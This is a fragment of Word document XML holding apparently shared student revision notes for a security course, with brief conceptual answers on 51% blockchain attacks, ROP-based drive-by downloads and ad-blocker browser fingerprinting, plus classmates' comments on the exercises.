    <w:p w:rsidR="37C20961" w:rsidP="37C20961" w:rsidRDefault="37C20961" w14:paraId="4B60969A" w14:textId="5610C3C8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="7EA872C9" w:rsidP="7EA872C9" w:rsidRDefault="6DEF2DB5" w14:paraId="3D3EF917" w14:textId="49F67E4A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="094FF3CA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>-require strong password?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5F518E54" w:rsidP="7EA872C9" w:rsidRDefault="5F518E54" w14:paraId="7808FBD6" w14:textId="205AEABE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7EA872C9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">E) </w:t>
      </w:r>
      <w:r w:rsidRPr="7EA872C9" w:rsidR="2B71B06D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="7EA872C9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">ermissionless so they can just join. If they have enough </w:t>
      </w:r>
      <w:r w:rsidRPr="7EA872C9" w:rsidR="0E76A029">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>resources,</w:t>
      </w:r>
      <w:r w:rsidRPr="7EA872C9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> they can orchestrate a 51%</w:t>
      </w:r>
      <w:r w:rsidRPr="7EA872C9" w:rsidR="0A043B59">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> attack, create a stealthchain, modify it how they want and then broadcast to modify the real chain.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0A043B59" w:rsidP="7EA872C9" w:rsidRDefault="0A043B59" w14:paraId="35B7ECC0" w14:textId="3EDB2419">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="56740F53">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">F) </w:t>
      </w:r>
      <w:r w:rsidRPr="56740F53" w:rsidR="261AF20E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>five reasons wtf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="261AF20E" w:rsidP="5DAC0D75" w:rsidRDefault="41A91F66" w14:paraId="0CA3DBB5" w14:textId="5D5BDC05">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5DAC0D75">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Computationally expensive</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4F7B9450" w:rsidP="56740F53" w:rsidRDefault="1E9B7ADC" w14:paraId="3177E6ED" w14:textId="788E26BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="5DAC0D75">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Throughput of blockchain isn’t enough I think</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="77E36A19" w:rsidP="62D4E821" w:rsidRDefault="6B3BE13E" w14:paraId="3C6A08B4" w14:textId="7E718691">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="5DAC0D75">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>High storage costs of all that data!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="49ADD95D" w:rsidP="24E2AC76" w:rsidRDefault="1CCEECBE" w14:paraId="291778B9" w14:textId="7E718691">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="5DAC0D75">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Can It give too much infos to the attackers? Such as how wealthy is an advertiser (lot of impressions)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="702F91EC" w:rsidP="2C5ED94A" w:rsidRDefault="7D2CBF90" w14:paraId="1A62545F" w14:textId="028E7DD0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="5DAC0D75">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>How would the blockchain be decentralised. Could a majority user control the chain and modify the history?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="546005A7" w:rsidP="0E43A8E4" w:rsidRDefault="546005A7" w14:paraId="6AC6A48B" w14:textId="553AF5CB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0A7D98F8">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>G) What even is a ROP-based drive by download??</w:t>
      </w:r>
      <w:r w:rsidRPr="0A7D98F8" w:rsidR="672AAB27">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0A7D98F8" w:rsidR="450A5628">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:eastAsia="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🙁</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="450A5628" w:rsidP="0A7D98F8" w:rsidRDefault="54D4F38E" w14:paraId="721BFEB9" w14:textId="7AD1824E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5DAC0D75">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>“drive-by” = user visits a website?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="450A5628" w:rsidP="0A7D98F8" w:rsidRDefault="54D4F38E" w14:paraId="5C8A1C7C" w14:textId="2AB63A99">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5DAC0D75">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>ROP-based implies we can control computation so I guess you can do whatever you want after that.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0A7D98F8" w:rsidP="0A7D98F8" w:rsidRDefault="0A7D98F8" w14:paraId="07BFE44E" w14:textId="004E97FE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="546005A7" w:rsidP="7EA872C9" w:rsidRDefault="546005A7" w14:paraId="1FF491B6" w14:textId="748B80DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7EA872C9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">H) </w:t>
      </w:r>
      <w:r w:rsidRPr="7EA872C9" w:rsidR="1DA2A391">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Fingerprinting works by using all the available information to try and uniquely identify your browser across visits/sites. An ad blocker is a brows</w:t>
      </w:r>
      <w:r w:rsidRPr="7EA872C9" w:rsidR="15870B76">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>er extension and so the exact ad blocker you use as well as the version just adds more information and makes your fingerprint more unique.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7EA872C9" w:rsidP="7EA872C9" w:rsidRDefault="125DA949" w14:paraId="1B73D8EF" w14:textId="422C38DF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7E035B5E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Ad blockers modify the DOM to block ads compared to if they weren’t active. Can affect timings of loading pages, can affect the resources present after the page has loaded</w:t>
      </w:r>
      <w:bookmarkStart w:name="OLE_LINK4" w:id="9"/>
      <w:r w:rsidRPr="7E035B5E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>. Can use all these as part of fingerprint – mayb</w:t>
      </w:r>
      <w:r w:rsidRPr="7E035B5E" w:rsidR="12B59BFB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>e a page tries to load a bunch of resources from URLs that are known to be blocked exclusively by specific ad blockers, to try and figure out which ones are installed.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="9"/>
    <w:p w:rsidR="7EA872C9" w:rsidP="7EA872C9" w:rsidRDefault="7EA872C9" w14:paraId="7B41A854" w14:textId="67C43F41">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="7EA872C9" w:rsidP="7EA872C9" w:rsidRDefault="7EA872C9" w14:paraId="38B9690C" w14:textId="3E74A19A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="7EA872C9">
      <w:headerReference w:type="default" r:id="rId11"/>
      <w:footerReference w:type="default" r:id="rId12"/>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SR" w:author="Shah, Rehan" w:date="2020-12-08T15:37:00Z" w:id="0">
    <w:p w:rsidR="0BB8119F" w:rsidRDefault="0BB8119F" w14:paraId="1DEE850B" w14:textId="308A5FDA">
      <w:r>
        <w:t>For B (t1:100, t2:1050), Home -&gt; Support would be 100+955 = 1055 which seems to be 5 bytes extra. Does that matter?</w:t>
      </w:r>
      <w:r>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0BB8119F" w:rsidRDefault="0BB8119F" w14:paraId="2157CA06" w14:textId="151C2DB2">
      <w:r>
        <w:t>--&gt; Home -&gt;Accounts -&gt;Savings</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0BB8119F" w:rsidRDefault="0BB8119F" w14:paraId="7B690BCA" w14:textId="5489E3E2">
      <w:r>
        <w:t>(100+550+400) might be another option</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="TD" w:author="Taneli, Doruk" w:date="2020-12-08T12:00:00Z" w:id="1">
    <w:p w:rsidR="0BB8119F" w:rsidRDefault="0BB8119F" w14:paraId="020CA36A" w14:textId="5E78E1FD">
      <w:r>
        <w:t>I agree, there shouldnt be 5 extra bytes.</w:t>
      </w:r>
      <w:r>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0BB8119F" w:rsidRDefault="0BB8119F" w14:paraId="37BECD76" w14:textId="699FA142">
      <w:r>
        <w:t>Another option for t2 is:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0BB8119F" w:rsidRDefault="0BB8119F" w14:paraId="17159646" w14:textId="5B50E2D9">
      <w:r>
        <w:t>--&gt;home-&gt;products-&gt;loans-&gt;personal loan</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="SR" w:author="Shah, Rehan" w:date="2020-12-08T15:54:00Z" w:id="6">
    <w:p w:rsidR="0BB8119F" w:rsidRDefault="0BB8119F" w14:paraId="3D771D03" w14:textId="6395C026">
      <w:r>
        <w:t>fat also has a one phoneme difference so we could include that as being very close as well</w:t>
      </w:r>
      <w:r>
        <w:annotationRef/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="MJ" w:author="Mulla, Jamal" w:date="2020-12-08T15:15:00Z" w:id="7">
    <w:p w:rsidR="45F17C26" w:rsidRDefault="45F17C26" w14:paraId="7520CA6E" w14:textId="1E26EE6A">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r>
        <w:t>Yep good point. Missed that one</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="SR" w:author="Shah, Rehan" w:date="2020-12-08T15:57:00Z" w:id="8">
    <w:p w:rsidR="0BB8119F" w:rsidRDefault="0BB8119F" w14:paraId="459463BC" w14:textId="37557CC2">
      <w:r>
        <w:t xml:space="preserve">Another approach discussed was to split all the domains into sub-domains. So we could have camera morning, camera afternoon, camera night, etc for each domain. Of course this would quadruple our number of domains, but ensures that we do not need to make too many changes to the existing structure </w:t>
      </w:r>
      <w:r>
        <w:annotationRef/>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="DN" w:author="D'Cotta, Nicolas" w:date="2021-12-10T18:44:31" w:id="1568133105">
    <w:p w:rsidR="4F145031" w:rsidRDefault="4F145031" w14:paraId="3D9CF420" w14:textId="7F21CC2C">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r w:rsidR="4F145031">
        <w:rPr/>
        <w:t>for 2021, anyone know which slide this is?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
    </w:p>
    <w:p w:rsidR="4F145031" w:rsidRDefault="4F145031" w14:paraId="54969E0C" w14:textId="54D99EFF">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
    </w:p>
  </w:comment>
  <w:comment w:initials="DN" w:author="D'Cotta, Nicolas" w:date="2021-12-10T18:45:29" w:id="939586348">
    <w:p w:rsidR="4F145031" w:rsidRDefault="4F145031" w14:paraId="55ED7E20" w14:textId="67320A22">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r w:rsidR="4F145031">
        <w:rPr/>
        <w:t>I cannot find it in the CH4 slides</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
    </w:p>
    <w:p w:rsidR="4F145031" w:rsidRDefault="4F145031" w14:paraId="23F63228" w14:textId="790EEB7B">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
    </w:p>
  </w:comment>
  <w:comment w:initials="CR" w:author="Chen, Ruo" w:date="2021-12-11T15:42:34" w:id="1270138861">
    <w:p w:rsidR="4F145031" w:rsidRDefault="4F145031" w14:paraId="288AA0E0" w14:textId="266B407B">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r w:rsidR="4F145031">
        <w:rPr/>
        <w:t>It's in the tutorial sheet 11.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="PT" w:author="Profit, William T" w:date="2021-12-14T15:25:21" w:id="979529574">
    <w:p w:rsidR="4F145031" w:rsidRDefault="4F145031" w14:paraId="0A583BA1" w14:textId="5A299761">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r w:rsidR="4F145031">
        <w:rPr/>
        <w:t>shouldn't this be top_secret_file ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="DN" w:author="D'Cotta, Nicolas" w:date="2021-12-16T13:52:30" w:id="1233167956">
    <w:p w:rsidR="4F145031" w:rsidRDefault="4F145031" w14:paraId="32A0E583" w14:textId="0B562955">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r w:rsidR="4F145031">
        <w:rPr/>
        <w:t>+1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:initials="DN" w:author="D'Cotta, Nicolas" w:date="2021-12-16T13:52:59" w:id="68242417">
    <w:p w:rsidR="4F145031" w:rsidRDefault="4F145031" w14:paraId="2411E24E" w14:textId="3FB4393A">
      <w:pPr>
        <w:pStyle w:val="CommentText"/>
      </w:pPr>
      <w:r w:rsidR="4F145031">
        <w:rPr/>
        <w:t xml:space="preserve">but there are no solutions for it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B690BCA"/>
  <w15:commentEx w15:done="1" w15:paraId="17159646" w15:paraIdParent="7B690BCA"/>
  <w15:commentEx w15:done="1" w15:paraId="3D771D03"/>
  <w15:commentEx w15:done="1" w15:paraId="7520CA6E" w15:paraIdParent="3D771D03"/>
  <w15:commentEx w15:done="0" w15:paraId="459463BC"/>
  <w15:commentEx w15:done="0" w15:paraId="54969E0C"/>
  <w15:commentEx w15:done="0" w15:paraId="23F63228" w15:paraIdParent="54969E0C"/>
  <w15:commentEx w15:done="0" w15:paraId="288AA0E0" w15:paraIdParent="54969E0C"/>
  <w15:commentEx w15:done="0" w15:paraId="0A583BA1"/>
  <w15:commentEx w15:done="0" w15:paraId="32A0E583" w15:paraIdParent="0A583BA1"/>
  <w15:commentEx w15:done="0" w15:paraId="2411E24E" w15:paraIdParent="54969E0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EED2A72" w16cex:dateUtc="2020-12-08T10:07:00Z"/>
  <w16cex:commentExtensible w16cex:durableId="0E98CA54" w16cex:dateUtc="2020-12-08T11:00:00Z"/>
  <w16cex:commentExtensible w16cex:durableId="466924FB" w16cex:dateUtc="2020-12-08T10:24:00Z"/>
  <w16cex:commentExtensible w16cex:durableId="5FDA96FE" w16cex:dateUtc="2020-12-08T15:15:00Z"/>
  <w16cex:commentExtensible w16cex:durableId="13F254D2" w16cex:dateUtc="2020-12-08T10:27:00Z"/>
  <w16cex:commentExtensible w16cex:durableId="6F0D2868" w16cex:dateUtc="2021-12-10T18:44:31.891Z"/>
  <w16cex:commentExtensible w16cex:durableId="620626E4" w16cex:dateUtc="2021-12-10T18:45:29.979Z"/>
  <w16cex:commentExtensible w16cex:durableId="233B0241" w16cex:dateUtc="2021-12-11T15:42:34.445Z"/>
  <w16cex:commentExtensible w16cex:durableId="600732B3" w16cex:dateUtc="2021-12-14T14:25:21.062Z"/>
  <w16cex:commentExtensible w16cex:durableId="447AB6A5" w16cex:dateUtc="2021-12-16T13:52:30.558Z"/>
  <w16cex:commentExtensible w16cex:durableId="06ADB265" w16cex:dateUtc="2021-12-16T13:52:59.432Z"/>
</w16cex:commentsExtensible>
</file>

<file path=word/commentsIds.xml><?xml version="1.0" encoding="utf-8"?>
<w16cid:commentsIds xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" mc:Ignorable="w16cid">
  <w16cid:commentId w16cid:paraId="7B690BCA" w16cid:durableId="6EED2A72"/>
  <w16cid:commentId w16cid:paraId="17159646" w16cid:durableId="0E98CA54"/>
  <w16cid:commentId w16cid:paraId="3D771D03" w16cid:durableId="466924FB"/>
  <w16cid:commentId w16cid:paraId="7520CA6E" w16cid:durableId="5FDA96FE"/>
  <w16cid:commentId w16cid:paraId="459463BC" w16cid:durableId="13F254D2"/>
  <w16cid:commentId w16cid:paraId="54969E0C" w16cid:durableId="6F0D2868"/>
  <w16cid:commentId w16cid:paraId="23F63228" w16cid:durableId="620626E4"/>
  <w16cid:commentId w16cid:paraId="288AA0E0" w16cid:durableId="233B0241"/>
  <w16cid:commentId w16cid:paraId="0A583BA1" w16cid:durableId="600732B3"/>
  <w16cid:commentId w16cid:paraId="32A0E583" w16cid:durableId="447AB6A5"/>
  <w16cid:commentId w16cid:paraId="2411E24E" w16cid:durableId="06ADB2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0115" w:rsidRDefault="00530115" w14:paraId="06358BA9" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00530115" w:rsidRDefault="00530115" w14:paraId="3BE172C9" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationNotice" w:id="1">
    <w:p w:rsidR="00530115" w:rsidRDefault="00530115" w14:paraId="5BBB3B2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E43A8E4" w:rsidTr="0E43A8E4" w14:paraId="2C8814F4" w14:textId="77777777">
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
        </w:tcPr>
        <w:p w:rsidR="0E43A8E4" w:rsidP="0E43A8E4" w:rsidRDefault="0E43A8E4" w14:paraId="7D53FBE3" w14:textId="4E0B2040">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:ind w:left="-115"/>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
        </w:tcPr>
        <w:p w:rsidR="0E43A8E4" w:rsidP="0E43A8E4" w:rsidRDefault="0E43A8E4" w14:paraId="15BC0611" w14:textId="394962FF">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:jc w:val="center"/>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
        </w:tcPr>
        <w:p w:rsidR="0E43A8E4" w:rsidP="0E43A8E4" w:rsidRDefault="0E43A8E4" w14:paraId="4CC608E8" w14:textId="55BD873E">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:ind w:right="-115"/>
            <w:jc w:val="right"/>
          </w:pPr>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p w:rsidR="0E43A8E4" w:rsidP="0E43A8E4" w:rsidRDefault="0E43A8E4" w14:paraId="0B29C35E" w14:textId="54270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0115" w:rsidRDefault="00530115" w14:paraId="0E045DA6" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00530115" w:rsidRDefault="00530115" w14:paraId="288B3866" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationNotice" w:id="1">
    <w:p w:rsidR="00530115" w:rsidRDefault="00530115" w14:paraId="056B484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E43A8E4" w:rsidTr="0E43A8E4" w14:paraId="278AA97E" w14:textId="77777777">
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
        </w:tcPr>
        <w:p w:rsidR="0E43A8E4" w:rsidP="0E43A8E4" w:rsidRDefault="0E43A8E4" w14:paraId="1AB661E0" w14:textId="6CC2C6A4">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:ind w:left="-115"/>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
        </w:tcPr>
        <w:p w:rsidR="0E43A8E4" w:rsidP="0E43A8E4" w:rsidRDefault="0E43A8E4" w14:paraId="11EB238D" w14:textId="4901C5C7">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:jc w:val="center"/>
          </w:pPr>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3120" w:type="dxa"/>
        </w:tcPr>
        <w:p w:rsidR="0E43A8E4" w:rsidP="0E43A8E4" w:rsidRDefault="0E43A8E4" w14:paraId="7C50A99D" w14:textId="789BA1FE">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:ind w:right="-115"/>
            <w:jc w:val="right"/>
          </w:pPr>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p w:rsidR="0E43A8E4" w:rsidP="0E43A8E4" w:rsidRDefault="0E43A8E4" w14:paraId="38460C1B" w14:textId="75125701">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
  </w:p>
</w:hdr>
</file>

<file path=word/intelligence2.xml><?xml version="1.0" encoding="utf-8"?>
<int2:intelligence xmlns:int2="http://schemas.microsoft.com/office/intelligence/2020/intelligence">
  <int2:observations>
    <int2:textHash int2:hashCode="E8tNFXZdNSnHfY" int2:id="hIJt9igX">
      <int2:state int2:type="LegacyProofing" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="ZVk85wNZMUTVqP" int2:id="CfcZziEP">
      <int2:state int2:type="LegacyProofing" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="3IVZjD4nkgrT4u" int2:id="DLjovj3x">
      <int2:state int2:type="LegacyProofing" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="p8JDxYGfudzP9p" int2:id="Y0dXH7Er">
      <int2:state int2:type="LegacyProofing" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="qQ6lK6GhEpaTRH" int2:id="Zf5WP5QV">
      <int2:state int2:type="LegacyProofing" int2:value="Rejected"/>
    </int2:textHash>
